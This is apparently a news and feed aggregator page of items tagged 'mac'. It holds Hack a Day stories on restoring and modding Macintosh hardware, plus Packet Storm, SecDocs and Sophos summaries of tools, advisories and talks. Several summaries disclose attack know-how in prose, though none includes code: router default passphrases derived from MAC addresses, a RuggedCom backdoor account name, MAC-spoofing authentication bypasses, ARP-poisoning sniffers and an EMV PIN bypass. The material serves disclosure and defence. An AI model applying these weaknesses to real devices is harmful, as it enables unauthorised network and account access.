220 items tagged "mac"
4:00 » Hack a Day
The Macintosh SE/30 is well regarded as the choice pick of the compact Mac line. Packing a powerful 68030 processor and with the capability to use up to 128 MB of RAM, it brought serious grunt to bear in a tight form factor. With these machines now over 30 years old, they’re often quite the worse for wear. [This Does Not Compute] had his work cut out for him getting this particular example up and running. (Video embedded below.)
With the computer displaying the famous SimasiMac screen on startup, it was sadly non-functional when switched on. [This Does Not Compute] went through all the usual attempts to fix this – washing the board, recapping, checking potentially broken traces – all to no avail. After much consternation, the fix was not so hard – a fresh set of RAM helped cure what ailed the Mac.
With the Mac now showing some signs of life, there was more to do. The floppy drive refused to boot, ejecting disks and failing to read anything. A head cleaning proved helpful, but not enough. It was only when the head motor’s worm gear was relubricated, enabling it to seek properly, that the drive was able to boot successfully. The hard drive proved resistant to any attempts to get it to work, so it was replaced with a SCSI2SD instead.
With the suite of repairs completed, the SE/30 was once again up and running. With a little elbow grease, the case and keyboard turned up a treat, too. [This Does Not Compute] now has one of the all-time classic Macs in excellent condition.
We’ve seen some great restorations in the past – this Commodore 64 full of dirt was a particularly compelling story. Video after the break.
13:00 » Hack a Day
Even among those of us with a penchant for repairing electronics, there are some failures which are generally considered too severe to come back from. A good example is liquid damage in a laptop; with so many components and complex circuits crammed into such a small area, making heads or tails of it once the corrosion sets in can be a real nightmare. Especially in the case of an older laptop, the conventional wisdom is to try and recover your files and then buy a new one.
But as we’ve come to learn, [Jason Gin] is not a man who often finds himself concerned with conventional wisdom. After finding an older MacBook with suspected liquid damage, he decided to see what it would take to restore it to working order. According to a note on the device, the screen was dead, the USB ports were fried, the battery didn’t take a charge, and it wouldn’t boot. No problem then, should be easy.
Upon opening up the circa-2012 laptop, [Jason] found the machine to be riddled with corrosion. We’re not just talking surface gunk either. After giving everything a good cleaning with isopropyl alcohol, the true extent of the damage became clear. Not only had traces on the PCB rotted away, but there were many components that were either damaged or missing altogether. Whatever spilled inside this poor Mac was clearly some nasty stuff.
[Jason] used OpenBoardView to pull up schematics and diagrams of the motherboard, and started the arduous task of visually comparing them to his damaged unit. In some areas, the corrosion was so bad he still had trouble locating the correct traces and pads. But with time and effort, he was able to start probing around and seeing what components had actually given up the ghost.
For the USB ports it ended up being a bad 10-microfarad ceramic capacitor, but for the LCD, he ended up having to replace the entire backlight driver IC. The prospect of working on this tiny BGA-25 device might have been enough for some to throw in the towel, but compared to the hand-soldered magnet wire repairs required elsewhere on the board, [Jason] says the installation of the new LP8550 chip was one of the easier aspects of the whole operation.
The write-up is a great read if you like a good repair success story, and we especially like the way he documented his diagnosis and resulting work on a per-system basis. It makes it much easier to understand just how many individual fires [Jason] had to put out. But if you’re more interested in feats of steady-handed soldering, check out his recent project to add a PCI-E slot to the Atomic Pi.
22:01 » Hack a Day
The vintage Macintosh all-in-one computers were a design icon, as well as being highly useful machines in the 80s and 90s. In the decades since, they’ve been used for everything from web servers to aquariums, but that’s not all. [Arcade Jason] decided to grab an old Macintosh Plus and turn it into a vector display.
The hack starts with the opening of a Macintosh, which naturally requires a long screwdriver with the right tip. Setting the stage for things to come, this is achieved by soldering together a couple of existing tools to get the reach he needs. [Jason] then proceeds to install a brightness control for the main electron gun, as well as deflection drivers and a spot killing circuit. Everything is done with the intention of the hack being reversible, as [Jason] didn’t wish to sacrifice a good Macintosh Plus just for the sake of having some fun.
For those unfamiliar with vector cathode-ray displays and the manner in which they are driven, [Arcade Jason] does a great job explaining the basics. A set of magnetic coils is used to alter the trajectory of an electron fired at the screen. If you aim those electrons in ordered lines from left-to-right, top-to-bottom you’ve created a raster display. If you instead guide the electrons to follow the shapes you want to appear on the screen you’ve created a vector display.
We can’t help but feel this would be a hilarious way to troll at a demoscene meetup. We’ve seen [Jason]’s vector work before, too — like this impressive color Asteroids hack.
19:00 » Hack a Day
After the immense failure of the 2013-era Apple Pro trash can Mac, Apple has been hard at work at the next generation of workstation desktops. This week, the new Mac Pro has been announced, and the specs are amazing: We finally can buy a professional, desktop Mac with half the storage of an iPhone. The big story isn’t the next generation of cheese-grater Macs, though: the new display, the Pro Display XDR, has killed the venerable VESA mount and we couldn’t be happier.
The VESA mount, or more correctly, the VESA Mounting Interface Standard, was created in 1997 as a mounting standard for flat panel monitors and televisions. Look on the back of your monitor, and you’ll probably find a pattern of M4 threaded inserts laid out on a 75mm or 100mm square. Larger sizes, with respectively larger thread sizes, are used for gigantic wall-mounted televisions. For the last two decades, this has been the standard for mounting monitors to stands. Now this standard faces a challenger thanks to the brave designers at Apple.
The new Pro Display XDR connects to the Pro Stand with a ‘puck-shaped magnetic connector’. This connector is designed to attach to the back of the Pro Display XDR and locks the Pro Stand and display together. This is a magnetic display mount, a game-changing advance in monitor mounting technology.
The new Pro Display mount allows for something not many VESA mounts are designed for: The Pro Display XDR can rotate into either portrait or landscape mode. While details are still forthcoming on whether this display will automatically change the display orientation in MacOS, this is something that has been possible for thirty years; the patent is absolutely expired, and anyone could build a dongle that switches between portrait and landscape mode automatically in relation to the direction of gravity.
The Apple Pro Stand goes on sale this fall, with a retail price of $999. You can tell that’s the punchline because that’s where we’re ending the article.
We’ll be waiting for the release of the Pro Display this fall, but in the meantime, get your pitchforks ready. There’s no way this display has any sort of sensor to detect which direction ‘down’ is, and you’re going to end up going into your computer’s settings to change between landscape and portrait.
19:32 » Packet Storm Security Recent Files
Mpctp is a tool for manipulating raw packets that offers a large number of options. Its primary purpose is to diagnose and test several scenarios involving the various types of TCP/IP packets. It is able to send specific types of packets to any given target and to manipulate various fields at runtime; fields such as the Source/Destination IP address and Source/Destination MAC address can be modified within the packet structure.
11:01 » Hack a Day
We’ve tried building our own ARM cross compiler on a Linux box and it’s no picnic. Luckily there is a free cross compiling toolchain available through Mentor Graphics (formerly called Code Sourcery G++). But those looking to develop on a Mac aren’t so lucky. There is help via a script, and [Michael] wrote a guide [...]
19:03 » Packet Storm Security Recent Files
ipset allows administration of sets of IP addresses/networks, ports, MAC addresses, and interfaces, which are stored in hash or bitmap data structures. These can then be used in conjunction with iptables to do fast presence lookups.
13:56 » Packet Storm Security Advisories
Having a preconfigured, randomly generated WPA2-PSK passphrase for wireless routers is basically a good idea, since a vendor-generated passphrase can be much more secure than most user-generated passwords. However, in the case of Belkin the default password is calculated solely from the MAC address of the device. Since the MAC address is broadcast in the beacon frames sent out by the device, a wireless attacker can calculate the default passphrase and then connect to the wireless network. Vulnerable versions include, but are not limited to, Belkin Surf N150 Model F7D1301v1, Belkin N900 Model F9K1104v1, Belkin N450 Model F9K1105V2, and possibly Belkin N300 Model F7D2301v1.
21:47 » SecDocs
Authors: Joseph Menn
Tags: software development
Event: Chaos Communication Congress 18th (18C3) 2001
Abstract: Perl, PHP, Python, Ruby - what's the next step? SmallScript is a rich multi-paradigm dynamic language superset/dialect of Smalltalk designed by David Simmons. This new language enables modular deployment as a small, very fast, pre-emptive multi-threaded execution platform providing small components, lightweight scripting and module facilities that scale up into the traditional space occupied by classic Smalltalk. Currently running on the Windows and .NET platforms, with both Linux and Mac ports on the way, this language may give the other players quite a run for their money.
21:51 » SecDocs
Authors: Angelo Laub
Tags: Mac OS X
Event: Chaos Communication Congress 21st (21C3) 2004
Abstract: Some recent security problems with Mac OS X stem from the fact that Apple tries to combine the Unix security model with easy and convenient usability and closed source. Showing examples from our own research we will take you on a pleasant journey to get root on almost any recent Macintosh. And of course, there will be "just one more thing". While rumors have it that Mac OS X is extremely secure due to its open-source Darwin core and the elaborate Unix security model, little is known about practical problems that hide under its hood. While the lack of serious worms and other malware for the Mac might give users a false sense of security, things aren't that pretty once you dig deeper in the system. SUID root programs, closed-source security components, and badly-chosen default settings pile up to a security nightmare waiting to happen. We will give an overview of the problems, demonstrate example code, and give you an insight into communication problems with Apple support on security issues. Both problems with Mac OS X 10.3 (Panther) and the future version 10.4 (Tiger) will be addressed. As you can expect from any decent Apple presentation, be prepared for "one more thing".
21:28 » SecDocs
Authors: Bruno Goncalves, Rob Havelt
Tags: WiFi
Event: Black Hat DC 2011
Abstract: The new 802.11p standard aims to provide reliable wireless communication for vehicular environments. The P802.11p specification defines functions and services required by Wireless Access in Vehicular Environments (WAVE) conformant stations to operate in varying environments and exchange messages either without having to join a BSS or within a BSS, and defines the WAVE signaling technique and interface functions that are controlled by the 802.11 MAC. Wireless telecommunications and information exchange between roadside and vehicle systems present some interesting security implications. This talk will present an analysis of the 802.11p 5.9 GHz band Wireless Access in Vehicular Environments (WAVE) / Dedicated Short Range Communications (DSRC), Medium Access Control (MAC), and Physical Layer (PHY) Specifications of this protocol. We will present methods of analyzing network communications (GNU Radio/USRP, firmware modifications, etc.), and potential security issues in the implementation of the protocol in practical environments such as in toll road implementations, telematics systems, and other implementations.
8:07 » Hack a Day
Even though the world of software defined radio started out as a Linux-only endeavor, several recent software releases have put the ball fully into the court of OS X users. [hpux735]'s new Cocoa Radio release provides a (nearly) fully functional software defined radio for anyone with a USB TV tuner and a Mac. Earlier this week, we [...]
4:00 » Hack a Day
Many have tried to put together an easy package for running software defined radio packages on the Mac. Not many have succeeded the way [Elias]' port of the gqrx SDR package has. It’s simply the easiest way to get a software defined radio up and running on the Mac. gqrx is a front end for the [...]
3:32 » SecDocs
Tags: hardening Linux
Event: Chaos Communication Congress 21st (21C3) 2004
Abstract: An introduction to the hardened toolchain used at the Hardened Gentoo project, which, combined with the PaX kernel, strong DAC/MAC control mechanisms and thorough, low-entry oriented user documentation, provides "full scale" protection for a wide range of users, from home users to enterprise businesses.
8:14 » Packet Storm Security Recent Files
ipset allows administration of sets of IP addresses/networks, ports, MAC addresses, and interfaces, which are stored in hash or bitmap data structures. These can then be used in conjunction with iptables to do fast presence lookups.
21:46 » SecDocs
Authors: Justus Winter, Martin Johns
Tags: CSRF
Event: Chaos Communication Congress 23rd (23C3) 2006
Abstract: A detailed introduction to Cross Site Request Forgery. This talk presents the fundamental cause of this vulnerability class and examples of potential attack consequences. The second half of the talk is devoted to avoiding and countering CSRF: implementing CSRF-proof session handling, transparent retrofitting of legacy applications and methods for client side protection. Cross Site Request Forgery (CSRF, a.k.a. Session Riding) attacks have been public since at least 2001. However, this class of web application vulnerabilities is rather obscure compared to attack vectors like Cross Site Scripting or SQL Injection. As the trend towards web applications continues and an increasing number of local programs and appliances like firewalls rely on web based frontends, the attack surface for CSRF grows continuously. While being in some cases as dangerous as e.g. Cross Site Scripting, CSRF vulnerabilities are often regarded as negligible. Moreover, this vulnerability class is often simply unknown to some web application developers. Many misconceptions on countering CSRF exist because of this obscurity. The talk will not only show how to avoid XSRF but also how NOT to do it. Furthermore, most presentations on CSRF only address attacks on cookie based session management. This talk will also cover attacks on http authentication, client side SSL and IP/Mac based access control. CSRF is an attack that targets the user rather than the web application. As long as web applications do not take measures to protect their users against this threat, it is important to investigate possibilities to implement client side mechanisms. This talk will cover a new anti-CSRF Firefox Extension, which is currently under development, as well as "RequestRodeo" - a client side proxy, which was, to the best of our knowledge, the first client-side solution for protection against XSRF attacks.
-
-
19:59
»
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2012-134 - The DCP ETSI dissector could trigger a zero division. The MongoDB dissector could go into a large loop. The XTP dissector could go into an infinite loop. The AFP dissector could go into a large loop. The RTPS2 dissector could overflow a buffer. The GSM RLC MAC dissector could overflow a buffer. The CIP dissector could exhaust system memory. The STUN dissector could crash. The EtherCAT Mailbox dissector could abort. The CTDB dissector could go into a large loop. This advisory provides the latest version of Wireshark which is not vulnerable to these issues.
-
-
17:00
»
SecuriTeam
Microsoft Office for Mac is prone to a local privilege-escalation vulnerability.
-
-
14:57
»
SecDocs
Authors:
Simon Wunderlich Tags:
wireless Event:
Chaos Communication Congress 24th (24C3) 2007 Abstract: Kernel hacking definitely is the queen of coding, but in order to bring mesh routing that one vital step further we had to conquer this, for us, uncharted territory. Working in the kernel itself is a tough and difficult task to manage, but the results and effectiveness to be gained justify the long and hard road to success. We took on the mission to go down that road, and the result is B.A.T.M.A.N. advanced, which is a kernel-land implementation of the B.A.T.M.A.N. mesh routing protocol specifically designed to manage Wireless MANs. During the last years the number of deployed mesh networks has increased dramatically and their constant growth drove us around the edge of what we thought was possible. To cope with this rapid development we had to leave the slow and limited track of tweaking existing approaches and take an evolutionary step forward by porting the B.A.T.M.A.N. protocol into kernel land and going down to layer 2. Using B.A.T.M.A.N. advanced as a showcase we will, in our lecture, deliver a detailed review on how one can go about developing Linux kernel modules, give insights in what difficulties to expect and provide practical tips on how to go about this challenge without experiencing a damaging kernel freeze in the process. We will describe what problems we faced migrating down to layer 2 and how we went about solving them, for example how we moved away from the kernel routing and handle the actual routing and data transport in B.A.T.M.A.N. itself. Also, moving to layer 2 meant leaving IPs behind and relying solely on MAC routing, enabling features like DHCP, IPX, IPv6, etc., which up to now was not possible and therefore comes as a big plus. On the other hand there were few if any diagnostic tools for routing on that level, so we had to go back one step and develop the tools we needed ourselves.
These and other things we will cover in our presentation, and also give an outlook into the future of mesh routing, which will bring it even closer to the source of WiFi, the wireless stack and its drivers, and thereby improve the overall performance even more.
-
-
15:19
»
Wirevolution
You know from a previous post how 802.11n gets to 600 megabits per second. 802.11ac does just three things to increase that by 1,056%:
- It adds a new Modulation and Coding Scheme (MCS) called 256-QAM. This increases the number of bits transmitted per symbol from 6 to 8, a factor of 1.33.
- It increases the maximum channel width from 40 MHz to 160 MHz (160 MHz is optional, but 80 MHz support is mandatory). This increases the number of subcarriers from 108 to 468, a factor of 4.33.
- It increases the maximum MIMO configuration from 4×4 to 8×8, increasing the number of spatial streams by a factor of 2. Multi-User MIMO (MU-MIMO) with beamforming means that these spatial streams can be directed to particular clients, so while the AP may have 8 antennas, the clients can have fewer, for example 8 clients each with one antenna.
Put those factors together and you have 1.33 x 4.33 x 2 = 11.56. Multiply the 600 megabits per second of 802.11n by that factor and you get 600 x 11.56 = 6,933 megabits per second for 802.11ac.
Note that nobody does this yet, and 160 MHz channels and 8×8 MIMO are likely to remain unimplemented for a long time. For example Broadcom’s recently announced BCM4360 and Qualcomm’s QCA9860 do 80 MHz channels, not 160 MHz, and 3 x 3 MIMO, so they claim maximum raw bit-rates of 1.3 gigabits per second. Which is still impressive.
Maximum theoretical raw bit-rate is a fun number to talk about, but of course in the real world that will (almost) never happen. What matters more is the useful throughput (raw bit-rate minus MAC overhead) and rate at range, the throughput you are likely to get at useful distances. Achieving this is very difficult, and it is where the manufacturers can differentiate with superior technology. For phone chips, power efficiency is also an important differentiator.
-
-
14:59
»
Packet Storm Security Exploits
Edimax version IC-3030iWn web administrative authentication bypass exploit. Written to use on a Mac. This also affects Edimax IC-3015 and Airlive WN 500.
-
-
9:57
»
Packet Storm Security Recent Files
Intercepter is a sniffer that offers various capabilities including sniffing for password hashes related to ICQ/IRC/AIM/FTP/IMAP/POP3/SMTP/LDAP/BNC/SOCKS/HTTP/WWW/NNTP/CVS/TELNET/MRA/DC++/VNC/MYSQL and ORACLE. It also sniffs ICQ/AIM/JABBER/YAHOO/MSN/GADU-GADU/IRC and MRA protocols. It has a built-in ARP poisoning module, can change MAC addresses of LAN adapters, and has various other interesting functionality.
-
-
12:01
»
Hack a Day
A few months ago [Antti Palosaari] discovered cheap USB TV tuners could be used as a software-defined radio. Since then, we’ve seen these TV tuners receive signals from GPS satellites and even the signals between air traffic control and passenger aircraft. Like everything cool, Mac support for these drivers is slightly terrible so [hpux735] wrote his own [...]
-
-
21:40
»
SecDocs
Authors:
Steven J. Murdoch Tags:
bank smart card Event:
Chaos Communication Congress 27th (27C3) 2010 Abstract: EMV is the dominant protocol used for smart card payments worldwide, with over 730 million cards in circulation. Known to bank customers as “Chip and PIN”, it is used in Europe; it is being introduced in Canada; and there is pressure from banks to introduce it in the USA too. EMV secures credit and debit card transactions by authenticating both the card and the customer presenting it through a combination of cryptographic authentication codes, digital signatures, and the entry of a PIN. In this paper we describe and demonstrate a protocol flaw which allows criminals to use a genuine card to make a payment without knowing the card’s PIN, and to remain undetected even when the merchant has an online connection to the banking network. The fraudster performs a man-in-the-middle attack to trick the terminal into believing the PIN verified correctly, while telling the issuing bank that no PIN was entered at all. The paper considers how the flaws arose, why they remained unknown despite EMV’s wide deployment for the best part of a decade, and how they might be fixed. Because we have found and validated a practical attack against the core functionality of EMV, we conclude that the protocol is broken. This failure is significant in the field of protocol design, and also has important public policy implications, in light of growing reports of fraud on stolen EMV cards. Frequently, banks deny such fraud victims a refund, asserting that a card cannot be used without the correct PIN, and concluding that the customer must be grossly negligent or lying. Our attack can explain a number of these cases, and exposes the need for further research to bridge the gap between the theoretical and practical security of bank payment systems. Smart cards have gradually replaced magnetic strip cards for point-of-sale and ATM transactions in many countries. 
The leading system, EMV (named after Europay, MasterCard, and Visa), has been deployed throughout most of Europe, and is currently being rolled out in Canada. As of early 2008, there were over 730 million EMV compliant smart cards in circulation worldwide. In EMV, customers authorize a credit or debit card transaction by inserting their card and entering a PIN into a point-of-sale terminal; the PIN is typically verified by the smart card chip, which is in turn authenticated to the terminal by a digital certificate. The transaction details are also authenticated by a cryptographic message authentication code (MAC), using a symmetric key shared between the payment card and the bank that issued the card to the customer (the issuer). EMV was heavily promoted under the “Chip and PIN” brand during its national rollout in the UK. The technology was advertised as a solution to increasing card fraud: a chip to prevent card counterfeiting, and a PIN to prevent abuse of stolen cards. Since its introduction in the UK the fraud landscape has changed significantly: lost and stolen card fraud is down, and counterfeit card fraud experienced a two year lull. But no type of fraud has been eliminated, and the overall fraud levels have actually risen (see Figure 1). The likely explanation for this is that EMV has simply moved fraud, not eliminated it. One goal of EMV was to externalise the costs of dispute from the issuing bank, in that if a disputed transaction has been authorised by a manuscript signature, it would be charged to the merchant, while if it had been authorised by a PIN then it would be charged to the customer. The net effect is that the banking industry, which was responsible for the design of the system, carries less liability for the fraud. The industry describes this as a ‘liability shift’. 
In the past few years, the UK media have reported numerous cases where cardholders’ complaints have been rejected by their bank and by government-approved mediators such as the Financial Ombudsman Service, using stock excuses such as ‘Your card was CHIP read and a PIN was used so you must have been negligent.’ Interestingly, an increasing number of complaints from believable witnesses indicate that their EMV cards were fraudulently used shortly after being stolen, despite there having been no possibility that the thief could have learned the PIN. In this paper, we describe a potential explanation. We have demonstrated how criminals can use stolen “Chip and PIN” (EMV) smart cards without knowing the PIN. Since “verified by PIN” – the essence of the system – does not work, we declare the Chip and PIN system to be broken.
-
-
10:22
»
Packet Storm Security Exploits
An undocumented backdoor account exists within all released versions of RuggedCom's Rugged Operating System (ROS®). The username for the account, which cannot be disabled, is "factory" and its password is dynamically generated based on the device's MAC address. Multiple attempts have been made in the past 12 months to have this backdoor removed and customers notified. Exploit included.
-
-
21:32
»
SecDocs
Authors:
Harald Welte Tags:
GSM phone Event:
Chaos Communication Congress 28th (28C3) 2011 Abstract: Almost everyone uses the packet-oriented transmission modes of cellular networks. However, unlike TCP/IP, Ethernet and WiFi, not many members of the hacker community are familiar with the actual protocol stack for those services. This talk aims to give an in-depth explanation of how the lower-layer protocols on the air and wired interfaces for packet data services in cellular networks are structured. For 2.5/2.75G, this includes RLC/MAC, NS, BSSGP, LLC, SNDCP and GTP. For 3G/3.5G, this includes RRC, RLC, PDCP, NBAP and RANAP.
-
-
21:27
»
Packet Storm Security Exploits
The D-Link DSL-2640B ADSL router suffers from a simple authentication bypass vulnerability by spoofing the MAC address of a logged in administrator.
-
-
11:01
»
Hack a Day
[Bradley Gawthrop's] biggest gripe about his laser cutter is the lack of Mac support. We don’t think we’d have any gripes if we owned one of these (yeah, that’s a lie…) but we can understand his second biggest issue which is the inability to see the work piece once it’s inside the machine. He figured [...]
-
-
17:10
»
Packet Storm Security Recent Files
The cryptographic algorithm called INCrypt32 is a MAC algorithm used to authenticate participants, RFID cards and readers, in HID Global's iCLASS systems. HID's iCLASS cards are widely used contactless smart cards for physical access control. Although INCrypt32 is the heart of the security of HID's iCLASS systems, its security had not been evaluated until now because the specification has not been open to the public. In this paper, the authors reveal the specification of INCrypt32 by reverse engineering an iCLASS card and investigate the security of INCrypt32. As a result, they show that the 64-bit secret key can be recovered using only 2^18 MAC queries if the attacker can request MACs for chosen messages of arbitrary length. If the length of messages is limited to pre-determined values by the authentication protocol, the required number of MAC queries grows to 2^42 to recover the secret key.
-
-
15:24
»
Packet Storm Security Recent Files
WOL-E is a suite of tools for the Wake on LAN feature of network-attached computers; this feature is now enabled by default on many Apple computers. These tools include brute-forcing the MAC address to wake up clients, sniffing WOL attempts and passwords, scanning for Apple devices and more.
-
-
17:20
»
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2012-007 - The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. Double free vulnerability in OpenSSL 0.9.8 before 0.9.8s, when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to have an unspecified impact by triggering failure of a policy check. The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer. The Server Gated Cryptography implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service via unspecified vectors. The GOST ENGINE in OpenSSL before 1.0.0f does not properly handle invalid parameters for the GOST block cipher, which allows remote attackers to cause a denial of service via crafted data from a TLS client. The updated packages have been patched to correct these issues.
-
17:20
»
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2012-006 - The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. Double free vulnerability in OpenSSL 0.9.8 before 0.9.8s, when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to have an unspecified impact by triggering failure of a policy check. The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer. The Server Gated Cryptography implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service via unspecified vectors. The updated packages have been patched to correct these issues.
-
-
18:59
Packet Storm Security Advisories
Debian Linux Security Advisory 2390-1 - Several vulnerabilities were discovered in OpenSSL, an implementation of TLS and related protocols. The DTLS implementation performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. A double free vulnerability when X509_V_FLAG_POLICY_CHECK is enabled allows remote attackers to cause application crashes and potentially execute arbitrary code by triggering failure of a policy check. On 32-bit systems, the operations on NIST elliptic curves P-256 and P-384 are not correctly implemented, potentially leaking the private ECC key of a TLS server. (Regular RSA-based keys are not affected by this vulnerability.) Various other issues were also addressed.

13:25
Hack a Day
[Ricard Dias] wrote in to tell us about his guide for developing Linux applications on a Mac. He really enjoys the development environment provided by XCode, and it doesn’t take much to make it work as an all-in-one solution for Linux development. The real trick here is the use of SSH to access a Linux [...]

6:04
Packet Storm Security Recent Files
Technitium MAC Address Changer allows you to change the Media Access Control (MAC) address of your Network Interface Card (NIC) irrespective of your NIC manufacturer or its driver. It has a very simple user interface and provides ample information regarding each NIC in the machine.

16:48
Packet Storm Security Recent Files
A MAC changing utility that uses both ifconfig and GNU-Macchanger (it checks whether macchanger exists and, if not, falls back to ifconfig) to spoof one's MAC with a totally random value. Written in Python.

10:17
Packet Storm Security Recent Files
0x4553-Intercepter is a WinPcap-based sniffer that offers various capabilities, including sniffing for password hashes related to ICQ/IRC/AIM/FTP/IMAP/POP3/SMTP/LDAP/BNC/SOCKS/HTTP/WWW/NNTP/CVS/TELNET/MRA/DC++/VNC/MYSQL and ORACLE. It also sniffs ICQ/AIM/JABBER/YAHOO/MSN/GADU-GADU/IRC and MRA protocols. It has a built-in ARP poisoning module, can change MAC addresses of LAN adapters, and has various other interesting functionality.

15:01
Hack a Day
As a new recruit to the 68k Macintosh Liberation Army, [dougg3] is really showing off his hardware hacking ability. He came up with a replacement ROM SIMM for his Mac IIci and made it play the Mario theme on boot instead of the normal chimes. Swapping out the ROM in these old macs isn’t an [...]

11:52
SecDocs
Authors: Brad Hill, Rachel Engel, Scott Stender
Tags: Kerberos
Event: Black Hat USA 2010
Abstract: The Kerberos protocol provides single sign-on authentication services for users and machines. Its availability on nearly every popular computing platform - Windows, Mac, and UNIX variants - makes it the primary choice for enterprise authentication. However, simply "adding a dash of Kerberos" does not magically make a network secure. Kerberos is a complicated protocol whose comprehensive description requires dozens of RFCs. To use it securely requires a careful dance between protocol designers, service developers, and system administrators – the kind of dance that never quite stays in step. A careful review of RFCs, deployment guidance, and developer reference materials reveals a host of “theoretical” flaws when Kerberos is used. This presentation will demonstrate new techniques that make the theoretical practical in common Kerberos deployments, and provide guidance to ensure that software and systems are hardened against attack.

18:01
Packet Storm Security Recent Files
Multi Threaded TCP Port Scanner allows you to scan 65535 TCP ports on an IP address. You can specify how many threads to run and the timeout. Furthermore, it will tell you the MAC address of the target and the services that are running. You can scan IP addresses on your network and find out which open ports you have.

14:05
Hack a Day
[Steve] over at Big Mess O’ Wires has never been so happy to see the “Sad Mac” icon. A little over a month ago, he decided to take on the task of building his own Mac clone using modern technology. Not to be confused with Mac emulation on modern hardware, he is attempting to build [...]

15:00
Sophos security news
Anti-Virus software for Mac delivers complete security and support for business and home users of popular Mac operating systems

9:01
Hack a Day
When [Liu] decided he wanted one of the new iPads, rather than fork out the cash he decided to build his own tablet Mac. His creation functions just as you would expect any tablet PC to, with some nice extra features such as running Windows XP for any of you Microsoft lovers. [Liu’s] tablet apparently [...]

23:28
Sophos product advisories
If you install SafeGuard Disk Encryption for Mac 5.50.1 on Mac OS X 10.7 (Lion), Mac OS X 10.7 will no longer start. Instead the computer boots up into the Mac OS X Recovery partition.

9:05
Hack a Day
Here’s a way to gain control of your projects using an Android device. Bluescripts is a free app available in the Android market that makes it a bit easier to make interfaces to send customizable messages. If you have a Bluetooth receiver in your project, connecting to it is as easy as putting the MAC [...]

6:06
Hack a Day
[Phillip Torrone] gave us a heads up about a project he and [Limor Fried] along with [Mike Doell] have just wrapped up. Their aptly-named “iCufflinks” softly pulsate with light the same way in which you see many Mac products do. The cufflinks are made from machined aluminum and have the ubiquitous “power symbol” milled into [...]

19:15
Packet Storm Security Advisories
Secunia Security Advisory - Two vulnerabilities have been reported in Microsoft Office for Mac, which can be exploited by malicious people to compromise a user's system.

19:34
Packet Storm Security Recent Files
Mpctp is a tool for manipulating raw packets that offers a large number of options. Its primary purpose is to diagnose and test several scenarios that involve the use of different types of TCP/IP packets. It is able to send certain types of packets to any specific target and to manipulate various fields at runtime. Fields that can be modified include the Source/Destination IP address and the Source/Destination MAC address.

21:44
Packet Storm Security Advisories
Secunia Security Advisory - A vulnerability has been reported in Skype for Mac, which can be exploited by malicious people to compromise a user's system.

8:49
Packet Storm Security Advisories
iDefense Security Advisory 04.12.11 - Remote exploitation of a memory corruption vulnerability in Microsoft Corp.'s Excel could allow an attacker to execute arbitrary code with the privileges of the current user. The vulnerability occurs when Excel parses a specially crafted Excel file. Specific values within this file can trigger a memory corruption vulnerability and may allow arbitrary code execution. The following Microsoft products are vulnerable: Excel 2002 SP3, Excel 2003 SP3, Office 2004 for Mac, Office 2008 for Mac, Open XML File Format Converter for Mac.

16:39
Packet Storm Security Recent Files
Monocle is a local network host discovery tool. In passive mode, it listens for ARP request and reply packets. In active mode, it sends ARP requests to a specified IP range. The result is a list of IP and MAC addresses present on the local network. Written to work on both Linux and FreeBSD.

11:05
Packet Storm Security Advisories
PRE-CERT Security Advisory - Both the 2.4 and 2.6 Linux kernels have multiple vulnerabilities. A buffer overflow bug in mac_partition in fs/partitions/mac.c (for MAC partition tables) allows for a denial-of-service (kernel panic) condition via a corrupted MAC partition table. A division-by-zero bug in ldm_get_vblks in fs/partitions/ldm.c (for LDM partition tables) allows a denial-of-service (kernel oops) condition via a corrupted LDM partition table. A buffer overflow bug in ldm_frag_add in fs/partitions/ldm.c (for LDM partition tables) may allow escalation of privileges or disclosure of sensitive information via a corrupted LDM partition table.

11:11
Packet Storm Security Recent Files
Mpctp is a tool for manipulating raw packets that offers a large number of options. Its primary purpose is to diagnose and test several scenarios that involve the use of different types of TCP/IP packets. It is able to send certain types of packets to any specific target and to manipulate various fields at runtime. Fields that can be modified include the Source/Destination IP address and the Source/Destination MAC address.

0:01
Packet Storm Security Tools
Mpctp is a tool for manipulating raw packets that offers a large number of options. Its primary purpose is to diagnose and test several scenarios that involve the use of different types of TCP/IP packets. It is able to send certain types of packets to any specific target and to manipulate various fields at runtime. Fields that can be modified include the Source/Destination IP address and the Source/Destination MAC address.

17:18
Packet Storm Security Recent Files
Huawei HG520 and HG530 routers are vulnerable to weak cipher attacks. It is possible to generate the default WEP/WPA key from the MAC address. This python code demonstrates the issue.

7:59
Packet Storm Security Recent Files
Kismet is an 802.11 layer 2 wireless network sniffer. It can sniff 802.11b, 802.11a, and 802.11g traffic. It is capable of sniffing using almost any wireless card supported in Linux; these currently fall into two groups: cards handled by libpcap and the Linux-Wireless extensions (such as Cisco Aironet), and cards supported by the Wlan-NG project which use the Prism/2 chipset (such as Linksys, Dlink, and Zoom). Besides Linux, Kismet also supports FreeBSD, OpenBSD and Mac OS X systems. Features: multiple packet capture sources, runtime network sorting by AP MAC address (BSSID), IP block detection via ARP and DHCP packet dissection, Cisco product detection via CDP, Ethereal- and tcpdump-compatible file logging, Airsnort-compatible "interesting" (cryptographically weak) packet logging, secure SUID behavior, GPS devices, and wireless device fingerprinting. Kismet also includes a tool called gpsmap that can be used to create maps from logged GPS data.

9:10
Packet Storm Security Exploits
